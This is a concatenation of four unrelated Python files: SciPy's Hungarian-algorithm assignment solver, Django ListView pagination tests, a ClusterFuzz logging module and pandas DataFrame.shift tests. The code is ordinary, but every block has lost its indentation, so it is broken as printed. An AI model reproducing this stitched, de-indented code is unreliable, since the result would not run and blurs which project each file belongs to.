This function can also solve a generalization of the classic assignment
problem where the cost matrix is rectangular. If it has more rows than
columns, then not every row needs to be assigned to a column, and vice
versa.
The method used is the Hungarian algorithm, also known as the Munkres or
Kuhn-Munkres algorithm.
Parameters
----------
cost_matrix : array
The cost matrix of the bipartite graph.
Returns
-------
row_ind, col_ind : array
An array of row indices and one of corresponding column indices giving
the optimal assignment. The cost of the assignment can be computed
as ``cost_matrix[row_ind, col_ind].sum()``. The row indices will be
sorted; in the case of a square cost matrix they will be equal to
``numpy.arange(cost_matrix.shape[0])``.
Notes
-----
.. versionadded:: 0.17.0
Examples
--------
>>> cost = np.array([[4, 1, 3], [2, 0, 5], [3, 2, 2]])
>>> from scipy.optimize import linear_sum_assignment
>>> row_ind, col_ind = linear_sum_assignment(cost)
>>> col_ind
array([1, 0, 2])
>>> cost[row_ind, col_ind].sum()
5
References
----------
1. http://csclab.murraystate.edu/bob.pilgrim/445/munkres.html
2. Harold W. Kuhn. The Hungarian Method for the assignment problem.
*Naval Research Logistics Quarterly*, 2:83-97, 1955.
3. Harold W. Kuhn. Variants of the Hungarian method for assignment
problems. *Naval Research Logistics Quarterly*, 3: 253-258, 1956.
4. Munkres, J. Algorithms for the Assignment and Transportation Problems.
*J. SIAM*, 5(1):32-38, March, 1957.
5. https://en.wikipedia.org/wiki/Hungarian_algorithm
"""
cost_matrix = np.asarray(cost_matrix)
if len(cost_matrix.shape) != 2:
raise ValueError("expected a matrix (2-d array), got a %r array"
% (cost_matrix.shape,))
# The algorithm expects more columns than rows in the cost matrix.
if cost_matrix.shape[1] < cost_matrix.shape[0]:
cost_matrix = cost_matrix.T
transposed = True
else:
transposed = False
state = _Hungary(cost_matrix)
# No need to bother with assignments if one of the dimensions
# of the cost matrix is zero-length.
step = None if 0 in cost_matrix.shape else _step1
while step is not None:
step = step(state)
if transposed:
marked = state.marked.T
else:
marked = state.marked
return np.where(marked == 1)
class _Hungary(object):
"""State of the Hungarian algorithm.
Parameters
----------
cost_matrix : 2D matrix
The cost matrix. Must have shape[1] >= shape[0].
"""
def __init__(self, cost_matrix):
self.C = cost_matrix.copy()
n, m = self.C.shape
self.row_uncovered = np.ones(n, dtype=bool)
self.col_uncovered = np.ones(m, dtype=bool)
self.Z0_r = 0
self.Z0_c = 0
self.path = np.zeros((n + m, 2), dtype=int)
self.marked = np.zeros((n, m), dtype=int)
def _clear_covers(self):
"""Clear all covered matrix cells"""
self.row_uncovered[:] = True
self.col_uncovered[:] = True
# Individual steps of the algorithm follow, as a state machine: they return
# the next step to be taken (function to be called), if any.
def _step1(state):
"""Steps 1 and 2 in the Wikipedia page."""
# Step 1: For each row of the matrix, find the smallest element and
# subtract it from every element in its row.
state.C -= state.C.min(axis=1)[:, np.newaxis]
# Step 2: Find a zero (Z) in the resulting matrix. If there is no
# starred zero in its row or column, star Z. Repeat for each element
# in the matrix.
for i, j in zip(*np.where(state.C == 0)):
if state.col_uncovered[j] and state.row_uncovered[i]:
state.marked[i, j] = 1
state.col_uncovered[j] = False
state.row_uncovered[i] = False
state._clear_covers()
return _step3
def _step3(state):
"""
Cover each column containing a starred zero. If n columns are covered,
the starred zeros describe a complete set of unique assignments.
In this case, Go to DONE, otherwise, Go to Step 4.
"""
marked = (state.marked == 1)
state.col_uncovered[np.any(marked, axis=0)] = False
if marked.sum() < state.C.shape[0]:
return _step4
def _step4(state):
"""
Find a noncovered zero and prime it. If there is no starred zero
in the row containing this primed zero, Go to Step 5. Otherwise,
cover this row and uncover the column containing the starred
zero. Continue in this manner until there are no uncovered zeros
left. Save the smallest uncovered value and Go to Step 6.
"""
# We convert to int as numpy operations are faster on int
C = (state.C == 0).astype(int)
covered_C = C * state.row_uncovered[:, np.newaxis]
covered_C *= np.asarray(state.col_uncovered, dtype=int)
n = state.C.shape[0]
m = state.C.shape[1]
while True:
# Find an uncovered zero
row, col = np.unravel_index(np.argmax(covered_C), (n, m))
if covered_C[row, col] == 0:
return _step6
else:
state.marked[row, col] = 2
# Find the first starred element in the row
star_col = np.argmax(state.marked[row] == 1)
if state.marked[row, star_col] != 1:
# Could not find one
state.Z0_r = row
state.Z0_c = col
return _step5
else:
col = star_col
state.row_uncovered[row] = False
state.col_uncovered[col] = True
covered_C[:, col] = C[:, col] * (
np.asarray(state.row_uncovered, dtype=int))
covered_C[row] = 0
def _step5(state):
"""
Construct a series of alternating primed and starred zeros as follows.
Let Z0 represent the uncovered primed zero found in Step 4.
Let Z1 denote the starred zero in the column of Z0 (if any).
Let Z2 denote the primed zero in the row of Z1 (there will always be one).
Continue until the series terminates at a primed zero that has no starred
zero in its column. Unstar each starred zero of the series, star each
primed zero of the series, erase all primes and uncover every line in the
matrix. Return to Step 3
"""
count = 0
path = state.path
path[count, 0] = state.Z0_r
path[count, 1] = state.Z0_c
while True:
# Find the first starred element in the col defined by
# the path.
row = np.argmax(state.marked[:, path[count, 1]] == 1)
if state.marked[row, path[count, 1]] != 1:
# Could not find one
break
else:
count += 1
path[count, 0] = row
path[count, 1] = path[count - 1, 1]
# Find the first prime element in the row defined by the
# first path step
col = np.argmax(state.marked[path[count, 0]] == 2)
if state.marked[row, col] != 2:
col = -1
count += 1
path[count, 0] = path[count - 1, 0]
path[count, 1] = col
# Convert paths
for i in range(count + 1):
if state.marked[path[i, 0], path[i, 1]] == 1:
state.marked[path[i, 0], path[i, 1]] = 0
else:
state.marked[path[i, 0], path[i, 1]] = 1
state._clear_covers()
# Erase all prime markings
state.marked[state.marked == 2] = 0
return _step3
def _step6(state):
"""
Add the value found in Step 4 to every element of each covered row,
and subtract it from every element of each uncovered column.
Return to Step 4 without altering any stars, primes, or covered lines.
"""
# the smallest uncovered value in the matrix
if np.any(state.row_uncovered) and np.any(state.col_uncovered):
minval = np.min(state.C[state.row_uncovered], axis=0)
minval = np.min(minval[state.col_uncovered])
state.C[~state.row_uncovered] += minval
state.C[:, state.col_uncovered] -= minval
return _step4
| |
from __future__ import absolute_import
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.test.utils import override_settings
from django.views.generic.base import View
from django.utils.encoding import force_str
from .models import Author, Artist
class ListViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'regressiontests.generic_views.urls'
def test_items(self):
res = self.client.get('/list/dict/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/list.html')
self.assertEqual(res.context['object_list'][0]['first'], 'John')
def test_queryset(self):
res = self.client.get('/list/authors/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
self.assertTrue(isinstance(res.context['view'], View))
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertIsNone(res.context['paginator'])
self.assertIsNone(res.context['page_obj'])
self.assertFalse(res.context['is_paginated'])
def test_paginated_queryset(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
self.assertEqual(len(res.context['object_list']), 30)
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertTrue(res.context['is_paginated'])
self.assertEqual(res.context['page_obj'].number, 1)
self.assertEqual(res.context['paginator'].num_pages, 4)
self.assertEqual(res.context['author_list'][0].name, 'Author 00')
self.assertEqual(list(res.context['author_list'])[-1].name, 'Author 29')
def test_paginated_queryset_shortdata(self):
# Test that short datasets ALSO result in a paginated view.
res = self.client.get('/list/authors/paginated/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertEqual(res.context['page_obj'].number, 1)
self.assertEqual(res.context['paginator'].num_pages, 1)
self.assertFalse(res.context['is_paginated'])
def test_paginated_get_page_by_query_string(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/', {'page': '2'})
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
self.assertEqual(len(res.context['object_list']), 30)
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertEqual(res.context['author_list'][0].name, 'Author 30')
self.assertEqual(res.context['page_obj'].number, 2)
def test_paginated_get_last_page_by_query_string(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/', {'page': 'last'})
self.assertEqual(res.status_code, 200)
self.assertEqual(len(res.context['object_list']), 10)
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertEqual(res.context['author_list'][0].name, 'Author 90')
self.assertEqual(res.context['page_obj'].number, 4)
def test_paginated_get_page_by_urlvar(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/3/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
self.assertEqual(len(res.context['object_list']), 30)
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertEqual(res.context['author_list'][0].name, 'Author 60')
self.assertEqual(res.context['page_obj'].number, 3)
def test_paginated_page_out_of_range(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/42/')
self.assertEqual(res.status_code, 404)
def test_paginated_invalid_page(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/?page=frog')
self.assertEqual(res.status_code, 404)
def test_paginated_custom_paginator_class(self):
self._make_authors(7)
res = self.client.get('/list/authors/paginated/custom_class/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['paginator'].num_pages, 1)
# Custom pagination allows for 2 orphans on a page size of 5
self.assertEqual(len(res.context['object_list']), 7)
def test_paginated_custom_page_kwarg(self):
self._make_authors(100)
res = self.client.get('/list/authors/paginated/custom_page_kwarg/', {'pagina': '2'})
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
self.assertEqual(len(res.context['object_list']), 30)
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertEqual(res.context['author_list'][0].name, 'Author 30')
self.assertEqual(res.context['page_obj'].number, 2)
def test_paginated_custom_paginator_constructor(self):
self._make_authors(7)
res = self.client.get('/list/authors/paginated/custom_constructor/')
self.assertEqual(res.status_code, 200)
# Custom pagination allows for 2 orphans on a page size of 5
self.assertEqual(len(res.context['object_list']), 7)
def test_paginated_orphaned_queryset(self):
self._make_authors(92)
res = self.client.get('/list/authors/paginated-orphaned/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['page_obj'].number, 1)
res = self.client.get(
'/list/authors/paginated-orphaned/', {'page': 'last'})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['page_obj'].number, 3)
res = self.client.get(
'/list/authors/paginated-orphaned/', {'page': '3'})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['page_obj'].number, 3)
res = self.client.get(
'/list/authors/paginated-orphaned/', {'page': '4'})
self.assertEqual(res.status_code, 404)
def test_paginated_non_queryset(self):
res = self.client.get('/list/dict/paginated/')
self.assertEqual(res.status_code, 200)
self.assertEqual(len(res.context['object_list']), 1)
def test_verbose_name(self):
res = self.client.get('/list/artists/')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'generic_views/list.html')
self.assertEqual(list(res.context['object_list']), list(Artist.objects.all()))
self.assertIs(res.context['artist_list'], res.context['object_list'])
self.assertIsNone(res.context['paginator'])
self.assertIsNone(res.context['page_obj'])
self.assertFalse(res.context['is_paginated'])
def test_allow_empty_false(self):
res = self.client.get('/list/authors/notempty/')
self.assertEqual(res.status_code, 200)
Author.objects.all().delete()
res = self.client.get('/list/authors/notempty/')
self.assertEqual(res.status_code, 404)
def test_template_name(self):
res = self.client.get('/list/authors/template_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertTemplateUsed(res, 'generic_views/list.html')
def test_template_name_suffix(self):
res = self.client.get('/list/authors/template_name_suffix/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertTemplateUsed(res, 'generic_views/author_objects.html')
def test_context_object_name(self):
res = self.client.get('/list/authors/context_object_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
self.assertNotIn('authors', res.context)
self.assertIs(res.context['author_list'], res.context['object_list'])
self.assertTemplateUsed(res, 'generic_views/author_list.html')
def test_duplicate_context_object_name(self):
res = self.client.get('/list/authors/dupe_context_object_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['object_list']), list(Author.objects.all()))
self.assertNotIn('authors', res.context)
self.assertNotIn('author_list', res.context)
self.assertTemplateUsed(res, 'generic_views/author_list.html')
def test_missing_items(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/list/authors/invalid/')
def test_paginated_list_view_does_not_load_entire_table(self):
# Regression test for #17535
self._make_authors(3)
# 1 query for authors
with self.assertNumQueries(1):
self.client.get('/list/authors/notempty/')
# same as above + 1 query to test if authors exist + 1 query for pagination
with self.assertNumQueries(3):
self.client.get('/list/authors/notempty/paginated/')
@override_settings(DEBUG=True)
def test_paginated_list_view_returns_useful_message_on_invalid_page(self):
# test for #19240
# tests that source exception's message is included in page
self._make_authors(1)
res = self.client.get('/list/authors/paginated/2/')
self.assertEqual(res.status_code, 404)
self.assertEqual(force_str(res.context.get('reason')),
"Invalid page (2): That page contains no results")
def _make_authors(self, n):
Author.objects.all().delete()
for i in range(n):
Author.objects.create(name='Author %02i' % i, slug='a%s' % i)
| |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Logging functions."""
import datetime
import json
import logging
from logging import config
import os
import sys
import time
import traceback
from typing import Any
STACKDRIVER_LOG_MESSAGE_LIMIT = 80000 # Allowed log entry size is 100 KB.
LOCAL_LOG_MESSAGE_LIMIT = 100000
LOCAL_LOG_LIMIT = 500000
_logger = None
_is_already_handling_uncaught = False
_default_extras = {}
def _increment_error_count():
""""Increment the error count metric."""
if _is_running_on_app_engine():
task_name = 'appengine'
else:
task_name = os.getenv('TASK_NAME', 'unknown')
from clusterfuzz._internal.metrics import monitoring_metrics
monitoring_metrics.LOG_ERROR_COUNT.increment({'task_name': task_name})
def _is_local():
"""Return whether or not in a local development environment."""
return (bool(os.getenv('LOCAL_DEVELOPMENT')) or
os.getenv('SERVER_SOFTWARE', '').startswith('Development/'))
def _is_running_on_app_engine():
"""Return whether or not we're running on App Engine (production or
development)."""
return os.getenv('GAE_ENV') or (
os.getenv('SERVER_SOFTWARE') and
(os.getenv('SERVER_SOFTWARE').startswith('Development/') or
os.getenv('SERVER_SOFTWARE').startswith('Google App Engine/')))
def _console_logging_enabled():
"""Return bool on where console logging is enabled, usually for tests and
reproduce tool."""
return bool(os.getenv('LOG_TO_CONSOLE'))
def suppress_unwanted_warnings():
"""Suppress unwanted warnings."""
# See https://github.com/googleapis/google-api-python-client/issues/299
logging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)
def set_logger(logger):
"""Set the logger."""
global _logger
_logger = logger
def get_handler_config(filename, backup_count):
"""Get handler config."""
root_directory = os.getenv('ROOT_DIR')
file_path = os.path.join(root_directory, filename)
max_bytes = 0 if _is_local() else LOCAL_LOG_LIMIT
return {
'class': 'logging.handlers.RotatingFileHandler',
'level': logging.INFO,
'formatter': 'simple',
'filename': file_path,
'maxBytes': max_bytes,
'backupCount': backup_count,
'encoding': 'utf8',
}
def get_logging_config_dict(name):
"""Get config dict for the logger `name`."""
logging_handler = {
'run_bot':
get_handler_config('bot/logs/bot.log', 3),
'run':
get_handler_config('bot/logs/run.log', 1),
'run_heartbeat':
get_handler_config('bot/logs/run_heartbeat.log', 1),
'heartbeat':
get_handler_config('bot/logs/heartbeat.log', 1),
'run_fuzzer':
get_handler_config('bot/logs/run_fuzzer.log', 1),
'run_testcase':
get_handler_config('bot/logs/run_testcase.log', 1),
'android_heartbeat':
get_handler_config('bot/logs/android_heartbeat.log', 1),
}
return {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': ('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
}
},
'handlers': {
'handler': logging_handler[name],
'fluentd': {
'class': 'clusterfuzz._internal.metrics.logs.JsonSocketHandler',
'level': logging.INFO,
'host': '127.0.0.1',
'port': 5170,
}
},
'loggers': {
name: {
'handlers': ['handler']
}
},
'root': {
'level': logging.INFO,
'handlers': ['fluentd']
}
}
def truncate(msg, limit):
"""We need to truncate the message in the middle if it gets too long."""
if len(msg) <= limit:
return msg
half = limit // 2
return '\n'.join([
msg[:half],
'...%d characters truncated...' % (len(msg) - limit), msg[-half:]
])
def format_record(record: logging.LogRecord) -> str:
"""Format LogEntry into JSON string."""
entry = {
'message':
truncate(record.getMessage(), STACKDRIVER_LOG_MESSAGE_LIMIT),
'created': (
datetime.datetime.utcfromtimestamp(record.created).isoformat() + 'Z'),
'severity':
record.levelname,
'bot_name':
os.getenv('BOT_NAME'),
'task_payload':
os.getenv('TASK_PAYLOAD'),
'name':
record.name,
}
entry['location'] = getattr(record, 'location', {'error': True})
entry['extras'] = getattr(record, 'extras', {})
update_entry_with_exc(entry, record.exc_info)
if not entry['extras']:
del entry['extras']
worker_bot_name = os.environ.get('WORKER_BOT_NAME')
if worker_bot_name:
entry['worker_bot_name'] = worker_bot_name
fuzz_target = os.getenv('FUZZ_TARGET')
if fuzz_target:
entry['fuzz_target'] = fuzz_target
# Log bot shutdown cases as WARNINGs since this is expected for preemptibles.
if (entry['severity'] in ['ERROR', 'CRITICAL'] and
'IOError: [Errno 4] Interrupted function call' in entry['message']):
entry['severity'] = 'WARNING'
return json.dumps(entry, default=_handle_unserializable)
def _handle_unserializable(unserializable: Any) -> str:
try:
return str(unserializable, 'utf-8')
except TypeError:
return str(unserializable)
def update_entry_with_exc(entry, exc_info):
"""Update the dict `entry` with exc_info."""
if not exc_info:
return
error = exc_info[1]
error_extras = getattr(error, 'extras', {})
entry['task_payload'] = (
entry.get('task_payload') or error_extras.pop('task_payload', None))
entry['extras'].update(error_extras)
entry['serviceContext'] = {'service': 'bots'}
# Reference:
# https://cloud.google.com/error-reporting/docs/formatting-error-messages,
if exc_info[0]:
# we need to set the result of traceback.format_exception to the field
# `message`. And we move our
entry['message'] += '\n' + ''.join(
traceback.format_exception(exc_info[0], exc_info[1], exc_info[2]))
else:
# If we log error without exception, we need to set
# `context.reportLocation`.
location = entry.get('location', {})
entry['context'] = {
'reportLocation': {
'filePath': location.get('path', ''),
'lineNumber': location.get('line', 0),
'functionName': location.get('method', '')
}
}
class JsonSocketHandler(logging.handlers.SocketHandler):
"""Format log into JSON string before sending it to fluentd. We need this
because SocketHandler doesn't respect the formatter attribute."""
def makePickle(self, record: logging.LogRecord):
"""Format LogEntry into JSON string."""
# \n is the recognized delimiter by fluentd's in_tcp. Don't remove.
return (format_record(record) + '\n').encode('utf-8')
def uncaught_exception_handler(exception_type, exception_value,
exception_traceback):
"""Handles any exception that are uncaught by logging an error and calling
the sys.__excepthook__."""
# Ensure that we are not calling ourself. This shouldn't be needed since we
# are using sys.__excepthook__. Do this check anyway since if we are somehow
# calling ourself we might infinitely send errors to the logs, which would be
# quite bad.
global _is_already_handling_uncaught
if _is_already_handling_uncaught:
raise Exception('Loop in uncaught_exception_handler')
_is_already_handling_uncaught = True
# Use emit since log_error needs sys.exc_info() to return this function's
# arguments to call init properly.
# Don't worry about emit() throwing an Exception, python will let us know
# about that exception as well as the original one.
emit(
logging.ERROR,
'Uncaught exception',
exc_info=(exception_type, exception_value, exception_traceback))
sys.__excepthook__(exception_type, exception_value, exception_traceback)
def configure_appengine():
"""Configure logging for App Engine."""
logging.getLogger().setLevel(logging.INFO)
if os.getenv('LOCAL_DEVELOPMENT') or os.getenv('PY_UNITTESTS'):
return
import google.cloud.logging
client = google.cloud.logging.Client()
handler = client.get_default_handler()
logging.getLogger().addHandler(handler)
def configure(name, extras=None):
"""Set logger. See the list of loggers in bot/config/logging.yaml.
Also configures the process to log any uncaught exceptions as an error.
|extras| will be included by emit() in log messages."""
suppress_unwanted_warnings()
if _is_running_on_app_engine():
configure_appengine()
return
if _console_logging_enabled():
logging.basicConfig()
else:
config.dictConfig(get_logging_config_dict(name))
logger = logging.getLogger(name)
logger.setLevel(logging.INFO)
set_logger(logger)
# Set _default_extras so they can be used later.
if extras is None:
extras = {}
global _default_extras
_default_extras = extras
# Install an exception handler that will log an error when there is an
# uncaught exception.
sys.excepthook = uncaught_exception_handler
def get_logger():
"""Return logger. We need this method because we need to mock logger."""
if _logger:
return _logger
if _is_running_on_app_engine():
# Running on App Engine.
set_logger(logging.getLogger())
elif _console_logging_enabled():
# Force a logger when console logging is enabled.
configure('root')
return _logger
def get_source_location():
"""Return the caller file, lineno, and funcName."""
try:
raise Exception()
except:
# f_back is called twice. Once to leave get_source_location(..) and another
# to leave emit(..).
# The code is adapted from:
# https://github.com/python/cpython/blob/2.7/Lib/logging/__init__.py#L1244
frame = sys.exc_info()[2].tb_frame.f_back
while frame and hasattr(frame, 'f_code'):
if not frame.f_code.co_filename.endswith('logs.py'):
return frame.f_code.co_filename, frame.f_lineno, frame.f_code.co_name
frame = frame.f_back
return 'Unknown', '-1', 'Unknown'
def _add_appengine_trace(extras):
"""Add App Engine tracing information."""
if not _is_running_on_app_engine():
return
from libs import auth
try:
request = auth.get_current_request()
if not request:
return
except Exception:
# FIXME: Find a way to add traces in threads. Skip adding for now, as
# otherwise, we hit an exception "Request global variable is not set".
return
trace_header = request.headers.get('X-Cloud-Trace-Context')
if not trace_header:
return
project_id = os.getenv('APPLICATION_ID')
trace_id = trace_header.split('/')[0]
extras['logging.googleapis.com/trace'] = (
'projects/{project_id}/traces/{trace_id}').format(
project_id=project_id, trace_id=trace_id)
def emit(level, message, exc_info=None, **extras):
"""Log in JSON."""
logger = get_logger()
if not logger:
return
# Include extras passed as an argument and default extras.
all_extras = _default_extras.copy()
all_extras.update(extras)
path_name, line_number, method_name = get_source_location()
if _is_running_on_app_engine():
if exc_info == (None, None, None):
# Don't pass exc_info at all, as otherwise cloud logging will append
# "NoneType: None" to the message.
exc_info = None
if level >= logging.ERROR:
# App Engine only reports errors if there is an exception stacktrace, so
# we generate one. We don't create an exception here and then format it,
# as that will not include frames below this emit() call. We do [:-2] on
# the stacktrace to exclude emit() and the logging function below it (e.g.
# log_error).
message = (
message + '\n' + 'Traceback (most recent call last):\n' + ''.join(
traceback.format_stack()[:-2]) + 'LogError: ' + message)
_add_appengine_trace(all_extras)
# We need to make a dict out of it because member of the dict becomes the
# first class attributes of LogEntry. It is very tricky to identify the extra
# attributes. Therefore, we wrap extra fields under the attribute 'extras'.
logger.log(
level,
truncate(message, LOCAL_LOG_MESSAGE_LIMIT),
exc_info=exc_info,
extra={
'extras': all_extras,
'location': {
'path': path_name,
'line': line_number,
'method': method_name
}
})
def log(message, level=logging.INFO, **extras):
"""Logs the message to a given log file."""
emit(level, message, **extras)
def log_warn(message, **extras):
"""Logs the warning message."""
emit(logging.WARN, message, exc_info=sys.exc_info(), **extras)
def log_error(message, **extras):
"""Logs the error in the error log file."""
exception = extras.pop('exception', None)
if exception:
try:
raise exception
except:
emit(logging.ERROR, message, exc_info=sys.exc_info(), **extras)
else:
emit(logging.ERROR, message, exc_info=sys.exc_info(), **extras)
_increment_error_count()
def log_fatal_and_exit(message, **extras):
"""Logs a fatal error and exits."""
wait_before_exit = extras.pop('wait_before_exit', None)
emit(logging.CRITICAL, message, exc_info=sys.exc_info(), **extras)
_increment_error_count()
if wait_before_exit:
log('Waiting for %d seconds before exit.' % wait_before_exit)
time.sleep(wait_before_exit)
sys.exit(-1)
| |
import numpy as np
import pytest
import pandas.util._test_decorators as td
import pandas as pd
from pandas import (
CategoricalIndex,
DataFrame,
Index,
Series,
date_range,
offsets,
)
import pandas._testing as tm
class TestDataFrameShift:
def test_shift(self, datetime_frame, int_frame):
# naive shift
shiftedFrame = datetime_frame.shift(5)
tm.assert_index_equal(shiftedFrame.index, datetime_frame.index)
shiftedSeries = datetime_frame["A"].shift(5)
tm.assert_series_equal(shiftedFrame["A"], shiftedSeries)
shiftedFrame = datetime_frame.shift(-5)
tm.assert_index_equal(shiftedFrame.index, datetime_frame.index)
shiftedSeries = datetime_frame["A"].shift(-5)
tm.assert_series_equal(shiftedFrame["A"], shiftedSeries)
# shift by 0
unshifted = datetime_frame.shift(0)
tm.assert_frame_equal(unshifted, datetime_frame)
# shift by DateOffset
shiftedFrame = datetime_frame.shift(5, freq=offsets.BDay())
assert len(shiftedFrame) == len(datetime_frame)
shiftedFrame2 = datetime_frame.shift(5, freq="B")
tm.assert_frame_equal(shiftedFrame, shiftedFrame2)
d = datetime_frame.index[0]
shifted_d = d + offsets.BDay(5)
tm.assert_series_equal(
datetime_frame.xs(d), shiftedFrame.xs(shifted_d), check_names=False
)
# shift int frame
int_shifted = int_frame.shift(1) # noqa
# Shifting with PeriodIndex
ps = tm.makePeriodFrame()
shifted = ps.shift(1)
unshifted = shifted.shift(-1)
tm.assert_index_equal(shifted.index, ps.index)
tm.assert_index_equal(unshifted.index, ps.index)
tm.assert_numpy_array_equal(
unshifted.iloc[:, 0].dropna().values, ps.iloc[:-1, 0].values
)
shifted2 = ps.shift(1, "B")
shifted3 = ps.shift(1, offsets.BDay())
tm.assert_frame_equal(shifted2, shifted3)
tm.assert_frame_equal(ps, shifted2.shift(-1, "B"))
msg = "does not match PeriodIndex freq"
with pytest.raises(ValueError, match=msg):
ps.shift(freq="D")
# shift other axis
# GH#6371
df = DataFrame(np.random.rand(10, 5))
expected = pd.concat(
[DataFrame(np.nan, index=df.index, columns=[0]), df.iloc[:, 0:-1]],
ignore_index=True,
axis=1,
)
result = df.shift(1, axis=1)
tm.assert_frame_equal(result, expected)
# shift named axis
df = DataFrame(np.random.rand(10, 5))
expected = pd.concat(
[DataFrame(np.nan, index=df.index, columns=[0]), df.iloc[:, 0:-1]],
ignore_index=True,
axis=1,
)
result = df.shift(1, axis="columns")
tm.assert_frame_equal(result, expected)
def test_shift_bool(self):
df = DataFrame({"high": [True, False], "low": [False, False]})
rs = df.shift(1)
xp = DataFrame(
np.array([[np.nan, np.nan], [True, False]], dtype=object),
columns=["high", "low"],
)
tm.assert_frame_equal(rs, xp)
def test_shift_categorical(self):
# GH#9416
s1 = Series(["a", "b", "c"], dtype="category")
s2 = Series(["A", "B", "C"], dtype="category")
df = DataFrame({"one": s1, "two": s2})
rs = df.shift(1)
xp = DataFrame({"one": s1.shift(1), "two": s2.shift(1)})
tm.assert_frame_equal(rs, xp)
def test_shift_fill_value(self):
# GH#24128
df = DataFrame(
[1, 2, 3, 4, 5], index=date_range("1/1/2000", periods=5, freq="H")
)
exp = DataFrame(
[0, 1, 2, 3, 4], index=date_range("1/1/2000", periods=5, freq="H")
)
result = df.shift(1, fill_value=0)
tm.assert_frame_equal(result, exp)
exp = DataFrame(
[0, 0, 1, 2, 3], index=date_range("1/1/2000", periods=5, freq="H")
)
result = df.shift(2, fill_value=0)
tm.assert_frame_equal(result, exp)
def test_shift_empty(self):
# Regression test for GH#8019
df = DataFrame({"foo": []})
rs = df.shift(-1)
tm.assert_frame_equal(df, rs)
def test_shift_duplicate_columns(self):
# GH#9092; verify that position-based shifting works
# in the presence of duplicate columns
column_lists = [list(range(5)), [1] * 5, [1, 1, 2, 2, 1]]
data = np.random.randn(20, 5)
shifted = []
for columns in column_lists:
df = DataFrame(data.copy(), columns=columns)
for s in range(5):
df.iloc[:, s] = df.iloc[:, s].shift(s + 1)
df.columns = range(5)
shifted.append(df)
# sanity check the base case
nulls = shifted[0].isna().sum()
tm.assert_series_equal(nulls, Series(range(1, 6), dtype="int64"))
# check all answers are the same
tm.assert_frame_equal(shifted[0], shifted[1])
tm.assert_frame_equal(shifted[0], shifted[2])
def test_shift_axis1_multiple_blocks(self, using_array_manager):
# GH#35488
df1 = DataFrame(np.random.randint(1000, size=(5, 3)))
df2 = DataFrame(np.random.randint(1000, size=(5, 2)))
df3 = pd.concat([df1, df2], axis=1)
if not using_array_manager:
assert len(df3._mgr.blocks) == 2
result = df3.shift(2, axis=1)
expected = df3.take([-1, -1, 0, 1, 2], axis=1)
expected.iloc[:, :2] = np.nan
expected.columns = df3.columns
tm.assert_frame_equal(result, expected)
# Case with periods < 0
# rebuild df3 because `take` call above consolidated
df3 = pd.concat([df1, df2], axis=1)
if not using_array_manager:
assert len(df3._mgr.blocks) == 2
result = df3.shift(-2, axis=1)
expected = df3.take([2, 3, 4, -1, -1], axis=1)
expected.iloc[:, -2:] = np.nan
expected.columns = df3.columns
tm.assert_frame_equal(result, expected)
@pytest.mark.filterwarnings("ignore:tshift is deprecated:FutureWarning")
def test_tshift(self, datetime_frame):
# TODO: remove this test when tshift deprecation is enforced
# PeriodIndex
ps = tm.makePeriodFrame()
shifted = ps.tshift(1)
unshifted = shifted.tshift(-1)
tm.assert_frame_equal(unshifted, ps)
shifted2 = ps.tshift(freq="B")
tm.assert_frame_equal(shifted, shifted2)
shifted3 = ps.tshift(freq=offsets.BDay())
tm.assert_frame_equal(shifted, shifted3)
msg = "Given freq M does not match PeriodIndex freq B"
with pytest.raises(ValueError, match=msg):
ps.tshift(freq="M")
# DatetimeIndex
shifted = datetime_frame.tshift(1)
unshifted = shifted.tshift(-1)
tm.assert_frame_equal(datetime_frame, unshifted)
